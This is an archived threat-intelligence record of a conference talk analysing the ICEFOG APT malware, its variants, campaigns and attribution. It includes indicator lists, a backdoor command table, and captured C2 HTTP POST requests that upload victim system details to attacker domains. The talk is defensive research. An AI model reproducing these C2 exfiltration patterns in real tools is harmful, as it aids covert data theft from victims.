{
	"id": "722f83c4-e853-458d-91b4-cd893f56cc05",
	"created_at": "2026-04-06T00:11:47.002919Z",
	"updated_at": "2026-04-10T03:37:54.311807Z",
	"deleted_at": null,
	"sha1_hash": "530c04eb6369ec8a5f433e970deaea34b79d0570",
	"title": "Into the Fog - The Return of ICEFOG APT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 114942,
	"plain_text": "Into the Fog - The Return of ICEFOG APT\r\nArchived: 2026-04-05 14:35:57 UTC\r\nTranscript\r\n1. *OUP-UIF'PH-m 5IF-3FUVSO-PG *$\u0026'0( \"15 Chi-en (Ashley) Shen Senior\r\nResearcher\r\n2. WHOIS • Chi En Shen (Ashley) • Senior Researcher at\r\nFireEye Global Intelligence Collection and Research Team. • Co-founder of HITCON GIRLS security\r\ncommunity in Taiwan • Review board of Black Hat Asia, Blue Hat Shanghai, Hack in the Box • First time\r\nlog in to Poland :D\r\n3.\r\n4. What is ICEFOG (aka Fucobha) ? • Kaspersky 2013 Report\r\n- The Icefog APT: A Tale of Cloak and Three Daggers. • A malware used in the campaigns targeted US, JP,\r\nTW and KR between 2011 – 2013. • Now ICEFOG is referred as a Malware family, a report, sometimes\r\nreferred as a group. (is it?)\r\n5. The ICEFOG Campaign Return? • Last public report in 2013\r\nand 2014. • No public reporting on the new ICEFOG campaign after 2014. What happened between these 5\r\nyears? • The samples discovered recently has changed the target scope. Is this the same group as in 2013? •\r\nGoal: find out what happened between these 5 years and find out who are using ICEFOG. Release of\r\nICEFOG report Blog about Java version ICEFOG. 2013 2014 2019 ?????????????????????????\r\n?????????????????????????\r\n6. Why Do We Care?\r\n7.\r\n8.\r\n9. 
ICEFOG Variants (\u003c2014) Old ICEFOG ICEFOG Type 1 ICEFOG Type\r\n2 ICEFOG Type 3 \u0026 4 (No sample) ICEFOG-NG ICEFOG OSX (aka Macfog) ICEFOG Java (aka\r\nJavafog) Support platform Windows Windows Windows (shellcode \u0026 standalone) Windows Windows Mac\r\nOSX Java Support Functions • upload_ • download_ • Cmd_ • code_ • upload_ • download_ • Cmd_ •\r\ncode_ • upload_ • download_ • Cmd_ • Code_ Unknown • Cmd • Download • Upload • sleep • upload_ •\r\ndownload_ • Cmd_ • code_ • upload_ • cmd_Update Domain • cmd_ Communication Method\r\nCommunicate with emails Communicate with C\u0026C server with “.aspx” scripts Script based proxy server\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 1 of 10\n\nC\u0026C server with scripts named “view.asp”, “update.asp”, “upfile.asp” TCP connection to port 5600\r\nCommunicate with C\u0026C server with “.aspx” scripts Communicate with C\u0026C server with “.aspx” scripts\r\n10.\r\n11.\r\n12. The CVE2017-11882 Exploit Template • Also, great research from Anomali.\r\n• https://www.anomali.com/blog/analyzing-digital-quartermasters-in-asia-do- chinese-and-indian-apts-have-a-shared-supply-chain Shellcode decode routine Open Document Encoded (0xFC) Dropper (8.t)\r\nDrops into %temp% Shellcode decode \u0026 execute Malware Can be hunted by the RTF Object Dropper\r\n13. The Shared Exploit Builder • CVE 2017-11882 exploit template. •\r\nActually, shared among at least 3 different groups. 
(APT40, Conimes team aka Goblin Panda, ICEFOG\r\nOperators) Threat Group Hash Malware Create Date Author Targeted Region APT40\r\nd5a7dd7441dc2b05464a21dd0 c0871ff BEACON 2017-12-07 08:17:00 Windows User USA\r\nTemp.CONIMES f223e4175649fa2e34271db8c9 68db12 TEMPFUN 2018-01-15 14:47:00 Windows User\r\nLAO Temp.CONIMES 07544892999b91ae2c9280d8e e3c663a TEMPFUN 2018-01-17 09:04:00 Windows\r\nUser VNM Temp.CONIMES 45a94b3b13101c932a72d89ff 5eb715a TEMPFUN 2018-01-31 11:24:00\r\nWindows User VNM ICEFOG Operator 46d91a91ecdf9c0abc7355c4e7 cf08fc ICEFOG 2018-02-22\r\n20:07:00 T TUR ICEFOG Operator 80883df4e89d5632fa72a8505 7773538 ICEFOG 2018-02-22 20:07:00\r\nT KZ, RU\r\n14.\r\n15. ICEFOG-P (New) Command Description cmd_ Execute the command received from\r\nC\u0026C download_ Download file from specified URL filelist_ Obtaining the list of files within specified\r\nfolder. upload_ File loading from the server to computer. delete_ Delete specified file rename_ Move file to\r\nspecified location newdir_ Create specified directory beforecontinuefile_ Reset connection to the server\r\ncontinuefile_ Resume the file download from the server. exit_ Terminate Process. transover_ Termination\r\nof current thread. screen_ Send screenshot to C\u0026C server. key_ Send keylogger’s log file to C\u0026C disklist_\r\nSetting monitored folders disklog_ Upload monitored folder’s data code_ (removed) run code from file to\r\nmemory New supported commands Gentle reminder for entering the main function 20130505 Check if\r\nsystem date \u003c 20130505 Anti- sandbox?\r\n16. 
ICEFOG-P (New) POST /upload.aspx?filepath=info\u0026filename=\u003chostname\u003e_\u003cMAC\r\naddress\u003e.jpg HTTP/1.1 User-Agent: Internet Explorer Host:\r\nfoo.com Content-Length: 862 Cache-Control: no-cache HOST NAME:WINDOWS7 USER NAME:user\r\nOS Version: Microsoft Windows 7 x86 Service Pack 1 (Build 7601) CPU: GenuineIntel Intel64 Family 6\r\nModel 142 Stepping 9 0MHZ Physical memory: Total physical memory:1023MB,Available\r\nmemory:388MB Windows Directory: C:\\\\Windows System Directory: C:\\\\Windows\\\\system32 Hard Disk:\r\nC:\\\\ (NTFS) CD-ROM Disk: D:\\\\ Disk space: Total disk space:39G,The remaining disk space:15G POST\r\n/news/upload.aspx?filepath=ok\u0026filename=\u003chostname\u003e_\u003chost IP\u003e.jpg HTTP/1.1 Host:\r\nicefog.8.100911.com Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* Accept-Language:\r\nen-us Content-Type: multipart/form-data Accept-Encoding: gzip, deflate Connection: Keep-Alive Cache-Control: no-cache User-Agent: MyAgent Content-Length: 0 Traffic of ICEFOG-P Traffic of ICEFOG Type\r\n1 Adds physical machine information, likely for filtering out sandbox or analysis environments\r\n17.\r\n18.\r\n19. ICEFOG-M (The latest) • Supports the same functions as ICEFOG-P. •\r\nCommunication changed to HTTPS via port 443. • Payload became file-less (stored in the registry), using a\r\ncustomized loader launched by a benign loader (DLL hijacking). • Loads an external sqlite3.dll library.\r\nEncrypted ICEFOG payload stored in registry\r\n20. 
PDB in ICEFOG PDB Associated ICEFOG Variant\r\nE:\\zc\\HTTPS\\HTTPS\\86AuthenticateProxy\\ExeLoader\\Release\\RasTls.pdb ICEFOG-P\r\nC:\\Users\\apper\\Desktop\\86AuthenticateProxy（copy）\\ExeLoader\\Release\\RasTls.pdb\r\nICEFOG-P C:\\0426\\86AuthenticateProxy\\ExeLoader\\Release\\RasTls.pdb ICEFOG-P C:\\Documents and\r\nSettings\\Administrator\\Desktop\\86AuthenticateProxy（copy） \\ExeLoader\\Release\\RasTls.pdb ICEFOG-P D:\\vvvvv\\downloadccc0301\\chen_http0301\\source\\Server\\64\\ExeLoader\\x64\\Release\\linkinfo.pdb\r\nICEFOG-P F:\\worktmp\\2014.11.05\\ff\\Server\\86AuthenticateProxy\\ExeLoader\\Release\\linkinfo.pdb\r\nICEFOG-P • e:\\jd4\\myServer(RegRun)\\release\\jd4(reg).pdb •\r\ne:\\jd4\\myServer(RegRun)\\release\\jd4(reg).pdb • d:\\jd\\jd(RegRun)\\release\\jd3(reg).pdb •\r\nx:\\jd(RegRun)\\release\\jd3(reg).pdb • d:\\jd\\jd(RegRun)\\release\\jd3(reg).pdb •\r\ne:\\6.26\\myServer\\release\\myServer.pdb • d:\\jd\\jd(RegRun)\\release\\jd3(reg).pdb •\r\nC:\\Users\\yang.zc\\Desktop\\代码片调用程序 4\\Release\\UCCodePieceGo.pdb • D:\\Undercurrent\\服务端\\代\r\n码片服务端\\过UAC版本\\专用代码片调用程序 \\Release\\UCCodePieceGo.pdb ICEFOG Type 1 ICEFOG\r\nType 2 \u003c 2013 ICEFOG Samples \u003e 2013 More developers?\r\n21. MacOS X ICEFOG (aka MacFog) • Among all the samples\r\nwe collected, some are the MacOS X MachO executable files. • The MacOS X ICEFOG was first\r\ndistributed in Chinese forums, forged as image process software. • Newly uploaded old samples, having the\r\nsame default C\u0026C setting. • Only one new sample with a private IP setting (testing?).\r\n22.\r\n23.\r\n24. How to determine the timeframe of the sample? • When\r\nwe found the sample after the campaign finished. • Consider: • PDNS time • Domain create date • Compile\r\ntimestamp (dropper? Payload? Wrapper?) • Exploit document last saved time (template?) 
• Decoy\r\ndocument timestamp • Date sample was first seen in the wild • PDB Sample Sample First Seen in the wild\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 3 of 10\n\nExploit Doc Last saved date Dropped Malware Compile Date C\u0026C Domain Passive DNS First Seen\r\nDecoy File Last Modifed date c3ed6b34707e 92f7aa35859a 9647f044 2017-08-03 10:48:09 2014/04/11\r\n0:00:00 2016-09-27 02:23:30 2017-08-03 2018-02-26 2017-08-02 19:17:00\r\n25.\r\n26.\r\n27.\r\n28.\r\n29.\r\n30. 2014 Samples Targets KZ and RU 2015 Attack Target an\r\nAgriculture Company in Europe 2016 2017 2019 Campaign Timeline Sample target potentially Russia\r\nTOPNEWS Campaign APPER Campaign Sample target Tajikistan Sample targets KZ 2018\r\nWATERFIGHT Campaign WATERFIGHT Campaign\r\n31. Attack targeted Agriculture Company in Europe (2015) • 64 bit\r\nICEFOG-P found in the compromised environment. • Persistent attack started from 2011. • Actor mainly\r\nused SOGU and FUNRUN backdoor to gain initial access. • Also, found VICEROY backdoor, which has\r\nbeen used by APT9. • We also found malware connects to APT10 infrastructure. • The ICEFOG backdoor\r\nfound at the scene was a customized version.\r\n32.\r\n33. • Campaign targets Mongolia and Russia, suspected media, finance and\r\ngovernment. • Sample delivered by spear-phishing email. • The ICEFOG samples are all ICEFOG-P\r\nvariant. • Some samples includes suspected campaign code information. 
Hash Compile Timestamp Drop\r\nby C\u0026C PDB Campaign Code eb2d297d099f3d39874 efa3f89735a01 2015/03/12 10:18:13\r\nf8cc15db9c85da19555a7232 b543c726 dnservers.itemdb.com russion.dnsedc.com C:\\Documents and\r\nSettings\\Administrator\\Desktop\\8 6AuthenticateProxy（copy） \\ExeLoader\\Release\\RasTls.pdb 02-03\r\nc7d2c170482d17e2e76 e6937bd8ab9a5 2015/05/14 5:11:42 B3EFDA0E130373DAF6CB17 801714B66F\r\n(rarsfx) bulgaa.sportsnewsa.net C:\\0426\\86AuthenticateProxy\\Exe Loader\\Release\\RasTls.pdb 120\r\n7dc1f0e60f11c456aa15 cc3546716c17 2015/05/14 6:11:42 e84b74f07ae803852f2ed194 58a1539d\r\n(tsalin.docx.exe) 74583d7355113ad3e58e355 b003083e5 (winword.scr) zaluu.dellnewsup.net\r\nC:\\0426\\86AuthenticateProxy\\Exe Loader\\Release\\RasTls.pdb 100 09d8f865bccfb239afab 4f4f564081ff\r\n2016/09/27 3:23:30 47713144ae08560ba939ea01 620a0a2d (toot.docx .exe) zaluu.dellnewsup.net\r\nE:\\zc\\HTTPS\\HTTPS\\86Authentic ateProxy\\ExeLoader\\Release\\Ras Tls.pdb b 2015 TOPNEWS\r\nCampaign\r\n34.\r\n35. 2015 TOPNEWS Campaign Hash Malware Family Compile timestamp C\u0026C Target\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 4 of 10\n\n664318c95c4a48debd3562e a602796b9 TEMPFUN 2014-07-23 12:44:56 win.dellnewsup.net\r\na489f2b4505b8f291804e393 1cf16ed8 TEMPFUN 2014-07-23 12:44:56 win.dellnewsup.net MN\r\n2e74505cc08c0d0d88146d4 6915f37af SOGU 2015-02-06 02:56:28 mn.dellnewsup.net\r\nnews.dellnewsup.net MN a0389879ea435e647d29f69 66b1d601f FUNRUN 2015-02-07 09:34:05\r\ndate.dellnewsup.net 1a93c0257f52e2b1e8e4f52c 033a61b3 SOGU 2011-03-02 07:40:24 dwm.dnsedc.com\r\nRU • The domain “dellnewsup.net” has 13 sub-domains. • Pivoting these sub-domains, we found other\r\nmalwares connected to the infrastructure. • Campaign also leveraged SOGU, TEMPFUN and FUNRUN to\r\nattack Mongolian targets from 2014 to 2015.\r\n36. 2015 TOPNEWS Campaign • Domains registrant email linked to the\r\nRoaming Tiger group and rotten tomato campaign. 
dellnewsup.net sportsnewsa.net dnsedc.com\r\ndnsqaz.com systemupdate5.dtdns.net transactiona.com googlenewsup.net futuresgolda.com\r\ngoogltrend.com financenewsu.net micronewsup.net dellindustry.com newsupdatea.net…… More\r\nyuminga1@126.com http://2014.zeronights.org/assets/files/slides/roaming_tiger_zeronights_2014.pdf\r\nRoaming Tiger Campaign\r\n37.\r\n38. 2016 APPER Campaign • Pivoting the C\u0026C infrastructure, we found\r\n8 related ICEFOG-P samples suspected of being used in the same campaign. • Same PDB strings in the\r\nsamples suggest a possible developer “apper”. Hash Compile Timestamp C\u0026C Campaig n code pdb\r\naae3e322 dbe5bb18 94a412ca 08afdf03 2016/05/22 10:35:41 ddns.epac.to cyexy\r\nC:\\Users\\apper\\Desktop\\86Authe nticateProxy（copy） \\ExeLoader\\Release\\RasTls.pdb e28c2d68\r\na6f13e81d 32171288 8c89e52 2016/05/19 8:26:23 ddns.epac.to (45.125.13.1 99) cyexy\r\nC:\\Users\\apper\\Desktop\\86Authe nticateProxy（copy） \\ExeLoader\\Release\\RasTls.pdb 0e25aa79\r\n1c911910 8af073bc9 e9d0fa2 2016/05/10 9:24:38 45.125.13.1 99 dxx C:\\Users\\apper\\Desktop\\86Authe\r\nnticateProxy（copy） \\ExeLoader\\Release\\RasTls.pdb a4dc9763 d296c45a 846156f0 2479ecde\r\n2016/05/10 8:49:45 45.125.13.1 99 ghj C:\\Users\\apper\\Desktop\\86Authe nticateProxy（copy）\r\n\\ExeLoader\\Release\\RasTls.pdb a9ecf6d26 74443cda c067b136 b04c7d0 2016/03/21 4:20:25 poff.wha.la\r\nsoums C:\\Users\\apper\\Desktop\\86Authe nticateProxy（copy） \\ExeLoader\\Release\\RasTls.pdb 404b1b78\r\nb4f34612e 61d4af3bf 5083f1 2016/03/21 4:20:25 poff.wha.la soums C:\\Users\\apper\\Desktop\\86Authe\r\nnticateProxy（copy） \\ExeLoader\\Release\\RasTls.pdb a78212faa 38ef1078b 300a4929 97fc02\r\n2016/03/21 4:20:25 poff.wha.la soums \\Users\\apper\\Desktop\\86Authent icateProxy（copy）\r\n\\ExeLoader\\Release\\RasTls.pdb 118.193.228.32 zorsoft.ns1.name tajikstantravel.dynamic-dns.net\r\ncospation.net poff.wha.la mitian123.com mocus.cospation.net cospation.net\r\n39. 
2018 The WATERFIGHT CAMPAIGN Hash File name Exploit Default codepage\r\nCreation Date Last Modified Author Last modify by 9ca6d45643f89bf233f0 8b7d74910346 Address Book\r\n2018.doc CVE-2017-11882 Western European 2018/02/22 20:07:00 2018/02/22 20:08:00 T T\r\nd00a34baad19d40dcefb adb0942a2e4d WorkPlan.doc CVE-2017-11882 Western European 2018/02/22\r\n20:07:00 2018/02/22 20:08:00 T T 88d667cc01c4d8ee32e 9de116f3bfdeb AMU_SLA_Agreement_Fin\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 5 of 10\n\nal_Dt_20-Spr_14.doc CVE-2017-11882 Simplified Chinese 2018/02/22 20:07:00 2018/03/14 17:34:00 T\r\nAdministrator 46d91a91ecdf9c0abc73 55c4e7cf08fc katılımcılar listesi.doc CVE-2017-11882 Western\r\nEuropean 2018/02/22 20:07:00 2018/02/22 20:08:00 T T 80883df4e89d5632fa72 a85057773538\r\nВнутренняя опись документов AGAT.doc CVE-2017-11882 Western European 2018/02/22 20:07:00\r\n2018/02/22 20:08:00 T T 7fa8c07634f937a1fcef9 180531dc2e4 счет.doc CVE-2017-11882 Simplified\r\nChinese 2017/05/22 11:52:00 2017:05:22 11:52:00 Windows Windows e7c5307691772a058fa\r\n7d9e8ea426a59 Задание.doc CVE-2017-11882 Simplified Chinese 2017/05/22 11:52:00 2017:05:22\r\n11:52:00 Windows Windows 63f9eaf7a80231480687 b134b1915bd0 Российский фигурист выиграл\r\nзимние Олимпийские игры PyeongChang в Южной Корее.doc CVE-2017-11882 Simplified Chinese\r\n2017/05/22 11:52:00 2017:05:22 11:52:00 Windows Windows • Campaign targeted suspected water source\r\nprovider, banks and government. • Targeted countries include Turkey, India, Kazakhstan, Uzbekistan and\r\nTajikistan.\r\n40. 2018 The WATERFIGHT CAMPAIGN Leveraged the shared exploit template\r\n41. 2018 The WATERFIGHT CAMPAIGN • Exploit document ICEFOG-P samples. •\r\nC\u0026C domain and file name shows interest in a water source company in Uzbekistan. 
• Compiled a lot\r\nsamples in 2 days Hash Compile date Drop by C\u0026C Campaign code 4178d9b22efe7044540043b5c770b6a\r\na 2018/02/24 5:20:16 9ca6d45643f89bf233f08b7d74910346 tele.zyns.com umde\r\n1c2d4c95c1b4e9d5193423719a7bb07 5 2018/02/23 8:13:20 d00a34baad19d40dcefbadb0942a2e4d\r\nuzwatersource.dynamic-dns.net osbc 71e5b89d5a804ddbe84fa4950bf97ac7 2018/02/26 11:58:57\r\n88d667cc01c4d8ee32e9de116f3bfdeb trendiis.sixth.biz hgmpy 6fffdb88292eeed0483b4030e58f401e\r\n2018/02/23 8:13:20 46d91a91ecdf9c0abc7355c4e7cf08fc uzwatersource.dynamic-dns.net osbc\r\n6850e553445c0c9eac3206331eb0429 b 2018/02/23 9:44:25 80883df4e89d5632fa72a85057773538\r\nlaugh.toh.info jkmsy d5c67718e35bd1083dd50335ba9e89d a 2018/02/23 8:44:25\r\n7fa8c07634f937a1fcef9180531dc2e4 laugh.toh.info jkmsy 9344e542cc1916b9ddb587daa70f065 2\r\n2018/02/23 9:35:38 e7c5307691772a058fa7d9e8ea426a59 aries.epac.to gskv\r\nc2893fefcadbc7fed4fe74ea56133901 2018/02/23 14:49:58 63f9eaf7a80231480687b134b1915bd0\r\nkastygost.compress.to msxdg\r\n42. 2018 PHKIGHT Campaign • On April 26, 2018, our appliance\r\ndetected ICEFOG traffic from out of the Philippines. • We also found the traffic of ICEFOG from the\r\nscanned URL on a public scanning service. The timestamp indicates that this campaign was likely still\r\nongoing in July and October 2018: POST /Home/upload.aspx?filepath=*\u0026filename=* HTTP/1.1 User-Agent: Internet Explorer Host: yahzee.eyellowarm.com:443 Content-Length: 908 Connection: Keep-Alive\r\nCache-Control: no-cache\r\n43. 2018 PHKIGHT Campaign • Investigating the C\u0026C domain “eyellowarm.com”, we\r\nfound two other sub- domains: • news.eyellowarm.com • meal.eyellowarm.com • The domain\r\n“news.eyellowarm.com” is connected by an ENDCMD (aka (Hussarini, Sarhust) malware, which we have\r\nobserved in APT15’s (aka Social Network Team) campaign. 
Hash filename Malware Compile Timestamp\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 6 of 10\n\nC\u0026C e5bdc78c686e15dfeed6696b cd5989c3 NvSmartMax.dll ENDCMD 2010-12-19 04:51:39\r\nnews.eyellowarm.com Note that although the sample has the compile timestamp in 2010, it is observed in\r\nthe wild in 2018 and the C\u0026C remains active during our analysis in 2018.\r\n44. 2018 PHKIGHT Campaign • Correlated (through passive DNS) infrastructure show\r\nstrong interest in the Philippines. - www.benzerold.com - ph4.01transport.com - news.eyellowarm.com -\r\ndurian.appleleveno.com - adove.benzerold.com - benzerold.com - mailback.benzerold.com -\r\nph2.01transport.com - phldt.appleleveno.com - yahzee.eyellowarm.com - mecaf.benzerold.com -\r\nipad.appleleveno.com - course.appleleveno.com - well.suverycool.com - pldt.benzerold.com -\r\nwww.knightpal.com - banana.appleleveno.com - appleleveno.com - node-ph-mnl2.kyssrcd.pw -\r\nisafp.numnote.com - ph1vip.blue-vpn.net - news.numnote.com - news.kaboolyn.com - topic.numnote.com\r\n- dns01.comesafe.com - is01.knightpal.com - eyellowarm.com - news.yahzee.eyellowarm.com -\r\nkaboolyn.com - dns1.kaboolyn.com - yahzee.yahzee.eyellowarm.com - ds03.numnote.com -\r\nmeal.eyellowarm.com - message.benzerold.com - pop3.numnote.com - afp1.kaboolyn.com -\r\ntrans.numnote.com - usiszero.benzerold.com - numnote.com - pldt.knightpal.com - ph1.numnote.com -\r\nns1.01transport.com - pldtcon.knightpal.com - afp1.knightpal.com - appdata.appleleveno.com -\r\nns2.01transport.com - ns01.knightpal.com - ph.01transport.com - support.numnote.com -\r\nph1.01transport.com - knightpal.com - pnoc1.numnote.com - 01transport.com\r\n45. 
2018 PHKIGHT Campaign Hash Malware family filename Compile Timestamp C\u0026C\r\nPDB string 4f11e00b015047642d8 ddc306fc90da0 ENDCMD NvSmartMax.dl l 2010-12-19 04:51:39\r\nnews.eyellowarm.com C:\\Users\\Sun\\Desktop \\new_test\\NvSmart\\R elease\\NvSmart.pdb\r\n1554900f889c9498c43c 9f875eceea38 MIRAGE netsh.exe 2013-06-28 09:27:57 pldtcon.knightpal.com\r\n7b8c955a0f1d6d37833 277849a070e37 ENDCMD Outllib.dll 2016-07-06 02:50:18 well.suverycool.com\r\n92853e0506ea16c6f17a c32f5ef8f3b3 ENDCMD Outllib.dll 2015-08-27 07:52:36 ipad.appleleveno.com\r\n4f11e00b015047642d8 ddc306fc90da0 ENDCMD Outllib.dll 2015-08-27 07:52:36\r\ndurian.appleleveno.com 86409708eb0c716858e a30ae15eb7d47 ENDCMD N/A 2010-12-19 04:53:10\r\nnews.kaboolyn.com C:\\Users\\Sun\\Desktop \\new_test\\NvSmart\\R elease\\NvSmart.pdb Malware Connected\r\nto the Correlated Domains • ENDCMD and MIRAGE malware were exclusively observed used by APT15\r\n(aka Social Network team). The targets, malware and TTP all align with the profile of APT15.\r\n46. 2019 SKYLINE Campaign • Observed the ongoing campaign that likely\r\ntargeted Turkey and Kazakhstan in 2019. • The timestamp suggests the campaign might have started from\r\n2018. • Leveraged CVE 2017-11882 shared exploit template with ICEFOG-M, no payload timestamp.\r\nHash filename Exploit Code Page Create Date Last modify date Author Last modify by\r\n30528dc0c1e123dff51f 40301cc03204 Unknown CVE-2018- 0802 Western European 2018/04/23 1:01:00\r\n2018/04/2 3 1:01:00 T T 4642e8712c8ada8d56b d36416abb4808 doc.rtf CVE-2017- 11882 N/A N/A N/A\r\nN/A N/A c65b73dde66184bae6e ad97afd1b4c4b doc20190301018.doc CVE 2017- 11882 Western\r\nEuropean 2018/04/23 1:01:00 2018/04/2 3 1:01:00 T T\r\n47.\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 7 of 10\n\n48.\r\n49. 
2019 SKYLINE Campaign • Two observed loaders Hash Compile Timestamp\r\nDrop by Observed Connected C\u0026C 0b86cc8e56a400f1adeb1e 7b6ebe6abe 2018/12/10 14:31:47\r\n4642e8712c8ada8d56bd36416abb480 8 nicodonald.accesscam.org c6a73e29c770065b4911ef 46285d6557\r\n2018/04/27 3:49:31 30528dc0c1e123dff51f40301cc03204 c65b73dde66184bae6ead97afd1b4c4b\r\nskylineqaz.crabdance.com xn— ylineqaz-y25ja.crabdance.com youareexcellent.kozow.com xn--\r\nuareexcellent-or3qa.kozow.com\r\n50. ICEFOG-M (The latest) POST /upload.aspx?filepath=info\u0026filename==\r\n\u003chostname\u003e_\u003cMAC address\u003e HTTP/1.1 User-Agent: Internet Explorer\r\nHost: foo.com Content-Length: 862 Cache-Control: no-cache HOST NAME:WINDOWS7 USER\r\nNAME:user OS Version: Microsoft Windows 7 x86 Service Pack 1 (Build 7601) CPU: GenuineIntel\r\nIntel64 Family 6 Model 142 Stepping 9 0MHZ Physical memory: Total physical\r\nmemory:1023MB,Available memory:388MB Windows Directory: C:\\\\Windows System Directory:\r\nC:\\\\Windows\\\\system32 Hard Disk: C:\\\\ (NTFS) CD-ROM Disk: D:\\\\ Disk space: Total disk\r\nspace:39G,The remaining disk space:15G Group : tttt1 Added Group ID in traffic 20130505 20130601\r\nUpdated the compared Date\r\n51. Who Are The Actor Behind These Campaigns?\r\n52.\r\n53. Targeting Country: UZ, MN, MY, RU, BY, KZ, US, Tibet,\r\nUA Targeting Industry: Gov, Oil and Gas, Aerospace, Defense Malware: SOGU, GHOST, TEMPFUN,\r\nFIRSTBLOOD, PI. Roaming Tiger Targeting Country: PH, VN, TW, US, UK, IT, PL, UN, SG, NATO\r\nTargeting Industry: Gov, Political party Malware: ENFAL, ENDCMD, QUICKHEAL, SOGU, CYFREE,\r\nMIRAGE, NOISEMAKER, QUICKHEAL, SWALLOWFLY APT15 Targeting Country: HK, US, SG, MY,\r\nJP, IN, KR, TH, TW Targeting Industry: Aerospace, Agriculture, Construction, Energy, Healthcare, ,High\r\nTech, Media, Transportation Malware: BIGJOLT,FUNRUN,GH0ST,HOMEUNIX,JIM\r\nA,PHOTO,POISON IVY,SKINNYGENE,SOGU,VICEROY,VIPSH\r\nELL,WETHEAD,XDOOR,ZXSHELL APT9\r\n54. 
What About Other Campaigns?\r\n55.\r\n56. eagleoftajik.dynamic-dns.net ICEFOG-P (0c410d22265 dece807193bf 8a47fd91f ) ICEFOG-P (e28c2d68a6f1 3e81d3217128 88c89e52)\r\nWATERFIGHT Campaign Target Tajikistan 45.125.13.199 APPER Campaign 118.193.228.32\r\nzorsoft.ns1.name tajikstantravel.dynamic-dns.net poff.wha.la SOGU (ee649cf2b4e4 0288cd1194c3\r\nhttps://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt\r\nPage 8 of 10\n\nda03edef ) 27.255.80.226 nitec.ns1.name SOGU (d5e8b1f836a9 199a9a176aee 007efc65 ) 103.243.24.149\r\nbluesky.zyns.com moonlight.compress.to 103.242.134.140 QUICKHEAL (5378d13965a 3499ea83d6d0\r\n371b03794 ) niteast.strangled.net whitebirds.mefound.com game.sexidude.com SOGU\r\n(d5e8b1f836a9199a9a176a ee007efc65 ) ICEFOG-P (be7ee5ae37dbf03df52 c6bfda41c6194)\r\nQUICKHEAL (E34874c27161eb563cfbdc0 0ee1334a2) WHITEBIRD (fdfcd9347c1f6f6a4daaf3f5\r\n0bc410c6) 45.252.63.244 honoroftajik.dynamic-dns.net uzwatersource.dynamic-dns.net ICEFOG-P\r\n(6fffdb88292eeed04 83b4030e58f401e) WATERFIGHT Campaign www.ddns.epac.to ICEFOG-P\r\n(a9ecf6d2674443cda c067b136b04c7d0)\r\n57. 2016 – 2017 APPER Campaign 2018 WATERFIGHT Campaign 2019 SKYLINE\r\nCampaign 2017 SOGU \u0026 QUICKHEAL targets KZ C\u0026C Infra Connected (118.193.228.32) Target TTP\r\nC\u0026C Infra Connected (103.242.132.197) C\u0026C Infra Connected (103.242.132.197) Target TTP C\u0026C Infra\r\nConnected (154.223.167.20, 45.77.134.195) 2015 Targets Tajikistan C\u0026C Infra Connected\r\n(103.242.132.197) 2014 Target KZ Target C\u0026C Infra Connected C\u0026C Infra Connected (103.242.132.197)\r\nWeak Medium Strong\r\n58. 
2016 – 2017 APPER Campaign 2018 WATERFIGHT Campaign 2019 SKYLINE\r\nCampaign 2015 TOPNEWS Campaign 2017 SOGU \u0026 QUICKHEAL targets KZ C\u0026C Infra Connected\r\n(118.193.228.32) Target TTP C\u0026C Infra Connected (103.242.132.197) C\u0026C Infra Connected\r\n(103.242.132.197) Target TTP C\u0026C Infra Connected (154.223.167.20, 45.77.134.195) 2015 Targets\r\nTajikistan C\u0026C Infra Connected (103.242.132.197) Roaming Tiger Campaign 2015 Target Agriculture in\r\nEU Same PDB string 2015 Target KZ 2018 PHKNIGHT Campaign APT15 Malware C\u0026C Overlap Target\r\nC\u0026C Infra Connected Registrant Email Target TTP APT9 Malware Sample Found in victim’s environment\r\n2014 Target KZ Target C\u0026C Infra Connected C\u0026C Infra Connected (103.242.132.197) Weak Medium\r\nStrong\r\n59. Temp Group A • Active since (at least): 2014 •\r\nDelivery method: Spear-phishing email • Exploitation method: Malicious macro, RARSFX, CVE 2017-\r\n11882, CVE 2012- 0158 • Target region: Russia, Kazakhstan, Tajikistan, Uzbekistan and Turkey •\r\nMalware: ICEFOG-P, ICEFOG-M, SOGU, QUICKHEAL • Connection to other group: Uses ICEFOG-P\r\nwith the same PDB as Roaming Tiger. Targeting Country: Rum KZ, Tajikistan, UZ, TR Targeting Industry:\r\nGov, Natural resource Malware: ICEFOG-P, ICEFOG-M, SOGU, QUICKHEAL ???????\r\n60. Conclusion • ICEFOG is malware shared among Roaming Tiger, APT15,\r\nTemp Group A and suspected APT9. • Shared malware is a pitfall for attribution, we should not do\r\nattribution only based on malware. • Temp Group A is aggressively using ICEFOG-P and ICEFOG-M to\r\ntarget Russia, Kazakhstan, Tajikistan, Uzbekistan and Turkey. • With the file-less ICEFOG-M, host-based\r\ndetection for payloads are more difficult. • Continued development indicates there could be more attacks\r\nleveraging ICEFOG in future campaigns, and possibly leveraged by more attackers.\r\n61. 
Q\u0026A Chi-en (Ashley) Shen Senior Researcher @ashley_shen_920\r\nSource: https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt"
	],
	"report_names": [
		"into-the-fog-the-return-of-icefog-apt"
	],
	"threat_actors": [
		{
			"id": "ec14074c-8517-40e1-b4d7-3897f1254487",
			"created_at": "2023-01-06T13:46:38.300905Z",
			"updated_at": "2026-04-10T02:00:02.918468Z",
			"deleted_at": null,
			"main_name": "APT10",
			"aliases": [
				"Red Apollo",
				"HOGFISH",
				"BRONZE RIVERSIDE",
				"G0045",
				"TA429",
				"Purple Typhoon",
				"STONE PANDA",
				"Menupass Team",
				"happyyongzi",
				"CVNX",
